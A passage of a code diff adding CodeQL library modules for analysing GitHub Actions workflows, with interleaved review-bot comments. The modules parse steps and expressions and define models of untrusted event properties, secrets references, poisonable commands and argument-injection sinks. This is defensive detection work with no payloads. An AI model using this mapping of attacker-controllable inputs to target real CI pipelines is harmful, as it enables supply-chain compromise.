+ result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt()
+ }
+
+ /** Gets the argument expression for the given key.
*/ + string getArgument(string key) { + exists(ScalarValueImpl scalar | + scalar.getNode() = this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) and + result = scalar.getValue() + ) + } + + /** Gets the argument expression for the given key (if it exists). */ + ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = + this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } +} + +/** A Uses step represents a call to an action that is defined in a GitHub repository. */ +class UsesStepImpl extends StepImpl, UsesImpl { + YamlScalar u; + + UsesStepImpl() { this.getNode().lookup("uses") = u } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + if u.getValue().indexOf("@") > 0 + then result = u.getValue().prefix(u.getValue().indexOf("@")) + else result = u.getValue() + } + + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().suffix(u.getValue().indexOf("@") + 1) } + + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" + } +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. 
+ * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ +private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + +private string pathUsesParser() { result = "\\./(.+)" } + +class ExternalJobImpl extends JobImpl, UsesImpl { + YamlScalar u; + + ExternalJobImpl() { n.lookup("uses") = u } + + override string getCallee() { + if u.getValue().matches("./%") + then result = u.getValue().regexpCapture(pathUsesParser(), 1) + else + result = + u.getValue().regexpCapture(repoUsesParser(), 1) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 2) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 3) + } + + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(YamlString name | + n.lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) + else none() + ) + } +} + +class RunImpl extends StepImpl { + YamlScalar script; + ScalarValueImpl scriptScalar; + + RunImpl() { + this.getNode().lookup("run") = script and + scriptScalar = TScalarValueNode(script) + } + + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } + + /** Gets the working directory for this `run` mapping. */ + string getWorkingDirectory() { + if exists(n.lookup("working-directory").(YamlString).getValue()) + then + result = + n.lookup("working-directory") + .(YamlString) + .getValue() + .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") + else result = "GITHUB_WORKSPACE/" + } + + /** Gets the shell for this `run` mapping. 
*/ + string getShell() { + if exists(n.lookup("shell")) + then result = n.lookup("shell").(YamlString).getValue() + else + if exists(this.getInScopeDefaultValue("run", "shell")) + then result = this.getInScopeDefaultValue("run", "shell").getValue() + else + if this.getEnclosingJob().getARunsOnLabel().matches(["ubuntu%", "macos%"]) + then result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches("windows%") + then result = "pwsh" + else result = "bash" + } + + ShellScriptImpl getScript() { result = scriptScalar } + + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +bindingset[s] +string getASimpleReferenceExpression(string s, int offset) { + // If the expression is ${{ inputs.foo == "foo" }} we should not consider it as a simple reference + // check that expression matches a simple reference or several simple references ORed with || + s.regexpMatch("([A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)(\\s*\\|\\|\\s*[A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)*") and + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). 
+ result = + s.trim() + .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", _) +} + +bindingset[s] +string getAFromJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAToJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)tojson\\(\\s*[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 2) +} + +bindingset[s] +string getAJsonReferenceAccessPath(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). 
+ result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*)", + 3) +} + +/** + * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +class SimpleReferenceExpressionImpl extends ExpressionImpl { + SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(this.getFullExpression(), _)) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) + } + + override string getExpression() { + ( + result = getASimpleReferenceExpression(this.getFullExpression(), _) + or + exists(getAJsonReferenceExpression(this.getFullExpression(), _)) and + result = this.getFullExpression() + ) + } + + abstract string getFieldName(); + + abstract AstNodeImpl getTarget(); + + override string toString() { result = this.getFullExpression() } +} + +class JsonReferenceExpressionImpl extends ExpressionImpl { + string innerExpression; + string accessPath; + + JsonReferenceExpressionImpl() { + innerExpression = getAJsonReferenceExpression(this.getExpression(), _) and + accessPath = getAJsonReferenceAccessPath(this.getExpression(), _) + } + + string getInnerExpression() { result = innerExpression } + + string getAccessPath() { result = accessPath } +} + +private string stepsCtxRegex() { + result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string needsCtxRegex() { + result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string jobsCtxRegex() { + result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") +} + +private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } + +private string matrixCtxRegex() { result = 
wrapRegexp("matrix\\.(.+)") } + +private string inputsCtxRegex() { + result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) +} + +private string secretsCtxRegex() { result = wrapRegexp("secrets\\.([A-Za-z0-9_-]+)") } + +private string githubCtxRegex() { + result = wrapRegexp("github\\.([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)") +} + +/** + * Holds for an expression accesing the `github` context. + * e.g. `${{ github.head_ref }}` + */ +class GitHubExpressionImpl extends SimpleReferenceExpressionImpl { + GitHubExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(githubCtxRegex()) + ) + } + + override string getFieldName() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + result = expr.regexpCapture(githubCtxRegex(), 1) + ) + } + + override AstNodeImpl getTarget() { none() } +} + +/** + * Holds for an expression accesing the `secrets` context. + * e.g. 
`${{ secrets.FOO }}` + */ +class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + SecretsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(secretsCtxRegex()) and + fieldName = expr.regexpCapture(secretsCtxRegex(), 1) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { none() } +} + +/** + * Holds for an expression accesing the `steps` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` + */ +class StepsExpressionImpl extends SimpleReferenceExpressionImpl { + string stepId; + string fieldName; + + StepsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + ( + this.getEnclosingJob() = result.getEnclosingJob() + or + exists(CompositeActionImpl a | + a.getAChildNode*() = this and + a.getAChildNode*() = result + ) + ) and + result.(StepImpl).getId() = stepId + } + + string getStepId() { result = stepId } +} + +/** + * Holds for an expression accesing the `needs` context. 
+ * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ needs.job1.outputs.foo}}` + */ +class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { + JobImpl neededJob; + string fieldName; + + NeedsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(needsCtxRegex()) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expr.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + ) + } + + string getNeededJobId() { result = neededJob.getId() } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + ( + this.getEnclosingJob().getANeededJob() = neededJob or + this.getEnclosingJob() = neededJob + ) and + ( + // regular jobs + neededJob.getOutputs() = result + or + // reusable workflow calling jobs + neededJob.(ExternalJobImpl) = result + ) + } +} + +/** + * Holds for an expression accesing the `jobs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. 
`${{ jobs.job1.outputs.foo}}` (within reusable workflows) + */ +class JobsExpressionImpl extends SimpleReferenceExpressionImpl { + string jobId; + string fieldName; + + JobsExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(JobImpl job | + job.getId() = jobId and + job.getLocation().getFile() = this.getLocation().getFile() and + job.getOutputs() = result + ) + } +} + +/** + * Holds for an expression the `inputs` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. `${{ inputs.foo }}` + */ +class InputsExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + InputsExpressionImpl() { + normalizeExpr(this.getExpression()).regexpMatch(inputsCtxRegex()) and + fieldName = normalizeExpr(this.getExpression()).regexpCapture(inputsCtxRegex(), 1) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + result.getLocation().getFile() = this.getLocation().getFile() and + ( + exists(ReusableWorkflowImpl w | w.getInput(fieldName) = result) + or + exists(CompositeActionImpl a | a.getInput(fieldName) = result) + ) + } +} + +/** + * Holds for an expression accesing the `env` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. 
`${{ env.foo }}` + */ +class EnvExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldName; + + EnvExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + ) + } + + override string getFieldName() { result = fieldName } + + override AstNodeImpl getTarget() { + exists(AstNodeImpl s | + s.getInScopeEnvVarExpr(fieldName) = result and + s.getAChildNode*() = this + ) + or + // Some Run steps may store taint in the enclosing job so we need to check the enclosing job + result = this.getEnclosingJob() + } +} + +/** + * Holds for an expression accesing the `matrix` context. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + * e.g. 
`${{ matrix.foo }}` + */ +class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { + string fieldAccess; + + MatrixExpressionImpl() { + exists(string expr | + ( + exists(getAJsonReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()).regexpCapture("(?i)(from|to)json\\((.*)\\).*", 2) + or + exists(getASimpleReferenceExpression(this.getExpression(), _)) and + expr = normalizeExpr(this.getExpression()) + ) and + expr.regexpMatch(matrixCtxRegex()) and + fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) + ) + } + + override string getFieldName() { result = fieldAccess } + + override AstNodeImpl getTarget() { + result = this.getEnclosingWorkflow().getStrategy().getMatrixVarExpr(fieldAccess) or + result = this.getEnclosingJob().getStrategy().getMatrixVarExpr(fieldAccess) + } + + string getLiteralValues() { + exists(StrategyImpl s, MatrixAccessPathImpl p, ScalarValueImpl v | + (s = this.getEnclosingJob().getStrategy() or s = this.getEnclosingWorkflow().getStrategy()) and + p.toString() = fieldAccess and + resolveMatrixAccessPath(s.getMatrix(), p).getNode(_) = v.getNode() and + // Exclude values containing matrix expressions to avoid recursion + not exists(MatrixExpressionImpl e | e.getParentNode() = v) and + result = v.getValue() + ) + } +} + +bindingset[accessPath] +string explodeAccessPath(string accessPath) { + result = accessPath or + result = accessPath.suffix(accessPath.indexOf(".") + 1) or + result = accessPath.prefix(accessPath.indexOf(".")) +} + +private newtype TAccessPath = + TMatrixAccessPathNode(string accessPath) { + exists(MatrixExpressionImpl e | accessPath = explodeAccessPath(e.getFieldName())) + } + +class MatrixAccessPathImpl extends TMatrixAccessPathNode { + string accessPath; + + MatrixAccessPathImpl() { this = TMatrixAccessPathNode(accessPath) } + + string toString() { result = accessPath } +} + +private YamlMappingLikeNode resolveMatrixAccessPath( + // TODO: support `include` and `exclude` keys + 
// https://docs.github.com/en/actions/using-jobs/using-a-matrix-for-your-jobs#expanding-or-adding-matrix-configurations + YamlMappingLikeNode root, MatrixAccessPathImpl accessPath +) { + // access path contains no dots. eg: "os" + result = root.getNode(accessPath.toString()) + or + // access path contains dots. eg: "plaform.os" + exists(MatrixAccessPathImpl first, MatrixAccessPathImpl rest, YamlMappingLikeNode newRoot | + first.toString() = accessPath.toString().splitAt(".", 0) and + rest.toString() = accessPath.toString().suffix(first.toString().length() + 1) and + newRoot = root.getNode(first.toString()) and + if newRoot instanceof YamlSequence + then result = resolveMatrixAccessPath(newRoot.(YamlSequence).getElementNode(_), rest) + else result = resolveMatrixAccessPath(newRoot, rest) + ) +} diff --git a/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll b/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll new file mode 100644 index 000000000000..49b83df48db5 --- /dev/null +++ b/actions/ql/lib/codeql/actions/ast/internal/Yaml.qll 
@@ -0,0 +1,57 @@
+/**
+ * Provides classes for working with YAML data.
+ *
+ * YAML documents are represented as abstract syntax trees whose nodes
+ * are either YAML values or alias nodes referring to another YAML value.
+ */
+
+private import codeql.yaml.Yaml as LibYaml
+
+private module YamlSig implements LibYaml::InputSig {
+ import codeql.Locations
+
+ class LocatableBase extends @yaml_locatable {
+ Location getLocation() {
+ exists(@location_default loc, File f, string p, int sl, int sc, int el, int ec |
+ f.getAbsolutePath() = p and
+ locations_default(loc, f, sl, sc, el, ec) and
+ yaml_locations(this, loc) and
+ result = TBaseLocation(p, sl, sc, el, ec)
+ )
+ }
+
+ string toString() { none() }
+ }
+
+ class NodeBase extends LocatableBase, @yaml_node {
+ NodeBase getChildNode(int i) { yaml(result, _, this, i, _, _) }
+
+ string getTag() { yaml(this, _, _, _, result, _) }
+
+ string getAnchor() { yaml_anchors(this, result) }
+
+ override string toString() { yaml(this, _, _, _, _, result) }
+ }
+
+ class ScalarNodeBase extends NodeBase, @yaml_scalar_node {
+ int getStyle() { yaml_scalars(this, result, _) }
+
+ string getValue() { yaml_scalars(this, _, result) }
+ }
+
+ class CollectionNodeBase extends NodeBase, @yaml_collection_node { }
+
+ class MappingNodeBase extends CollectionNodeBase, @yaml_mapping_node { }
+
+ class SequenceNodeBase extends CollectionNodeBase, @yaml_sequence_node { }
+
+ class AliasNodeBase extends NodeBase, @yaml_alias_node {
+ string getTarget() { yaml_aliases(this, result) }
+ }
+
+ class ParseErrorBase extends LocatableBase, @yaml_error {
+ string getMessage() { yaml_errors(this, result) }
+ }
+}
+
+import LibYaml::Make
diff --git a/actions/ql/lib/codeql/actions/config/Config.qll b/actions/ql/lib/codeql/actions/config/Config.qll
new file mode 100644
index 000000000000..265d4bd820f8
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/config/Config.qll
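Review bot: `ParseErrorBase` inherits `string toString() { none() }` from `LocatableBase` and does not override it, so a YAML parse error has no textual representation in query results unless `LibYaml::Make` adds one on top (I cannot see that module here). Consider `override string toString() { result = this.getMessage() }` in `ParseErrorBase`, since a parse error is presumably the case where a workflow could not be modelled at all and is worth surfacing readably. The `none()` body in the base class also deserves a one-line comment stating that every concrete subclass is expected to override it, otherwise it reads like a bug.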
@@ -0,0 +1,147 @@
+import ConfigExtensions as Extensions
+
+/**
+ * MaD models for workflow details
+ * Fields:
+ * - path: Path to the workflow file
+ * - trigger: Trigger for the workflow
+ * - job: Job name
+ * - secrets_source: Source of secrets
+ * - permissions: Permissions for the workflow
+ * - runner: Runner info for the workflow
+ */
+predicate workflowDataModel(
+ string path, string trigger, string job, string secrets_source, string permissions, string runner
+) {
+ Extensions::workflowDataModel(path, trigger, job, secrets_source, permissions, runner)
+}
+
+/**
+ * MaD models for repository details
+ * Fields:
+ * - visibility: Visibility of the repository
+ * - default_branch_name: Default branch name
+ */
+predicate repositoryDataModel(string visibility, string default_branch_name) {
+ Extensions::repositoryDataModel(visibility, default_branch_name)
+}
+
+/**
+ * MaD models for context/trigger mapping
+ * Fields:
+ * - trigger: Trigger for the workflow
+ * - context_prefix: Prefix for the context
+ */
+predicate contextTriggerDataModel(string trigger, string context_prefix) {
+ Extensions::contextTriggerDataModel(trigger, context_prefix)
+}
+
+/**
+ * MaD models for externally triggerable events
+ * Fields:
+ * - event: Event name
+ */
+predicate externallyTriggerableEventsDataModel(string event) {
+ Extensions::externallyTriggerableEventsDataModel(event)
+}
+
+private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] }
+
+/**
+ * MaD models for poisonable commands
+ * Fields:
+ * - regexp: Regular expression for matching poisonable commands
+ */
+predicate poisonableCommandsDataModel(string regexp) {
+ exists(string sub_regexp |
+ Extensions::poisonableCommandsDataModel(sub_regexp) and
+ regexp = commandLauncher() + sub_regexp + ".*"
+ )
+}
+
+/**
+ * MaD models for poisonable local scripts
+ * Fields:
+ * - regexp: Regular expression for matching poisonable local scripts
+ * - group: Script capture group number for the regular expression
+ */
+predicate poisonableLocalScriptsDataModel(string regexp, int command_group) {
+ exists(string sub_regexp |
+ Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and
+ regexp = commandLauncher() + sub_regexp + ".*"
+ )
+}
+
+/**
+ * MaD models for arguments to commands that execute the given argument.
+ * Fields:
+ * - regexp: Regular expression for matching argument injections.
+ * - command_group: capture group for the command.
+ * - argument_group: capture group for the argument.
+ */
+predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) {
+ exists(string sub_regexp |
+ Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and
+ regexp = commandLauncher() + sub_regexp
+ )
+}
+
+/**
+ * MaD models for poisonable actions
+ * Fields:
+ * - action: action name
+ */
+predicate poisonableActionsDataModel(string action) {
+ Extensions::poisonableActionsDataModel(action)
+}
+
+/**
+ * MaD models for event properties that can be user-controlled.
+ * Fields:
+ * - property: event property
+ * - kind: property kind
+ */
+predicate untrustedEventPropertiesDataModel(string property, string kind) {
+ Extensions::untrustedEventPropertiesDataModel(property, kind)
+}
+
+/**
+ * MaD models for vulnerable actions
+ * Fields:
+ * - action: action name
+ * - vulnerable_version: vulnerable version
+ * - vulnerable_sha: vulnerable sha
+ * - fixed_version: fixed version
+ */
+predicate vulnerableActionsDataModel(
+ string action, string vulnerable_version, string vulnerable_sha, string fixed_version
+) {
+ Extensions::vulnerableActionsDataModel(action, vulnerable_version, vulnerable_sha, fixed_version)
+}
+
+/**
+ * MaD models for immutable actions
+ * Fields:
+ * - action: action name
+ */
+predicate immutableActionsDataModel(string action) { Extensions::immutableActionsDataModel(action) }
+
+/**
+ * MaD models for untrusted git commands
+ * Fields:
+ * - cmd_regex: Regular expression for matching untrusted git commands
+ * - flag: Flag for the command
+ */
+predicate untrustedGitCommandDataModel(string cmd_regex, string flag) {
+ Extensions::untrustedGitCommandDataModel(cmd_regex, flag)
+}
+
+/**
+ * MaD models for untrusted gh commands
+ * Fields:
+ * - cmd_regex: Regular expression for matching untrusted gh commands
+ * - flag: Flag for the command
+ */
+predicate untrustedGhCommandDataModel(string cmd_regex, string flag) {
+ Extensions::untrustedGhCommandDataModel(cmd_regex, flag)
+}
diff --git a/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll
new file mode 100644
index 000000000000..99ad7eb8df1b
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/config/ConfigExtensions.qll
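Review bot: `argumentInjectionSinksDataModel` and `poisonableLocalScriptsDataModel` prepend `commandLauncher()` to the model's regexp but pass `command_group`/`argument_group` through unchanged, which is only correct because none of the launcher alternatives (`""`, `"sudo\\s+"`, `"su\\s+"`, `"xvfb-run\\s+"`) contains a capturing group, and that invariant is written down nowhere. Add above `commandLauncher()`: `// Must not contain capturing groups: the *_group indexes in the predicates below are relative to the model regexp, which this launcher is prefixed to.`, so the next person who adds a launcher with parentheses does not silently shift every group index. The QLDoc of `poisonableLocalScriptsDataModel` also calls the second field `group` while the parameter is `command_group` (the extensible declaration in ConfigExtensions.qll uses `group`); pick one name for both files.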
@@ -0,0 +1,74 @@
+/**
+ * This module provides extensible predicates for defining MaD models.
+ */
+
+/**
+ * Holds if workflow data model exists for the given parameters.
+ */
+extensible predicate workflowDataModel(
+ string path, string trigger, string job, string secrets_source, string permissions, string runner
+);
+
+/**
+ * Holds if repository data model exists for the given parameters.
+ */
+extensible predicate repositoryDataModel(string visibility, string default_branch_name);
+
+/**
+ * Holds if a context expression starting with context_prefix is available for a given trigger.
+ */
+extensible predicate contextTriggerDataModel(string trigger, string context_prefix);
+
+/**
+ * Holds if a given trigger event can be fired by an external actor.
+ */
+extensible predicate externallyTriggerableEventsDataModel(string event);
+
+/**
+ * Holds for strings that match poisonable commands.
+ */
+extensible predicate poisonableCommandsDataModel(string regexp);
+
+/**
+ * Holds for strings that match poisonable local scripts.
+ */
+extensible predicate poisonableLocalScriptsDataModel(string regexp, int group);
+
+/**
+ * Holds for actions that can be poisoned through local files.
+ */
+extensible predicate poisonableActionsDataModel(string action);
+
+/**
+ * Holds for event properties that can be user-controlled.
+ */
+extensible predicate untrustedEventPropertiesDataModel(string property, string kind);
+
+/**
+ * Holds for arguments to commands that execute the given argument
+ */
+extensible predicate argumentInjectionSinksDataModel(
+ string regexp, int command_group, int argument_group
+);
+
+/**
+ * Holds for actions that are known to be vulnerable.
+ */
+extensible predicate vulnerableActionsDataModel(
+ string action, string vulnerable_version, string vulnerable_sha, string fixed_version
+);
+
+/**
+ * Holds for actions that are known to be immutable.
+ */
+extensible predicate immutableActionsDataModel(string action);
+
+/**
+ * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch.
+ */
+extensible predicate untrustedGitCommandDataModel(string cmd_regex, string flag);
+
+/**
+ * Holds for gh commands that may introduce untrusted data
+ */
+extensible predicate untrustedGhCommandDataModel(string cmd_regex, string flag);
diff --git a/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll
new file mode 100644
index 000000000000..af5e0f62552f
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/controlflow/BasicBlocks.qll
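Review bot: The QLDoc on `untrustedGitCommandDataModel`, `untrustedGhCommandDataModel` and `untrustedEventPropertiesDataModel` restates the predicate name and leaves the `flag` and `kind` columns undescribed, and because these are `extensible` predicates populated from data extensions, this comment is the only place a model author learns what those columns may hold. Document each parameter, e.g. for the git predicate ` * - cmd_regex: regular expression matched against the git command line` followed by a line saying how `flag` is interpreted (what it is compared with, and whether it is a regexp or a literal), rather than "Flag for the command" as in Config.qll. The `untrustedGhCommandDataModel` doc also drops the "when called on an attacker controlled branch" qualifier its git counterpart carries and ends without a period; say whether the narrower wording is intentional.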
@@ -0,0 +1,444 @@ +/** Provides classes representing basic blocks. */ + +private import codeql.actions.Cfg +private import codeql.actions.Ast +private import codeql.Locations + +/** + * A basic block, that is, a maximal straight-line sequence of control flow nodes + * without branches or joins. + */ +class BasicBlock extends TBasicBlockStart { + /** Gets the scope of this basic block. */ + final CfgScope getScope() { result = this.getFirstNode().getScope() } + + /** Gets an immediate successor of this basic block, if any. */ + BasicBlock getASuccessor() { result = this.getASuccessor(_) } + + /** Gets an immediate successor of this basic block of a given type, if any. */ + BasicBlock getASuccessor(SuccessorType t) { + result.getFirstNode() = this.getLastNode().getASuccessor(t) + } + + /** Gets an immediate predecessor of this basic block, if any. */ + BasicBlock getAPredecessor() { result.getASuccessor() = this } + + /** Gets an immediate predecessor of this basic block of a given type, if any. */ + BasicBlock getAPredecessor(SuccessorType t) { result.getASuccessor(t) = this } + + /** Gets the control flow node at a specific (zero-indexed) position in this basic block. */ + Node getNode(int pos) { bbIndex(this.getFirstNode(), result, pos) } + + /** Gets a control flow node in this basic block. */ + Node getANode() { result = this.getNode(_) } + + /** Gets the first control flow node in this basic block. */ + Node getFirstNode() { this = TBasicBlockStart(result) } + + /** Gets the last control flow node in this basic block. */ + Node getLastNode() { result = this.getNode(this.length() - 1) } + + /** Gets the length of this basic block. */ + int length() { result = strictcount(this.getANode()) } + + /** + * Holds if this basic block immediately dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which is an immediate + * predecessor of `bb`). 
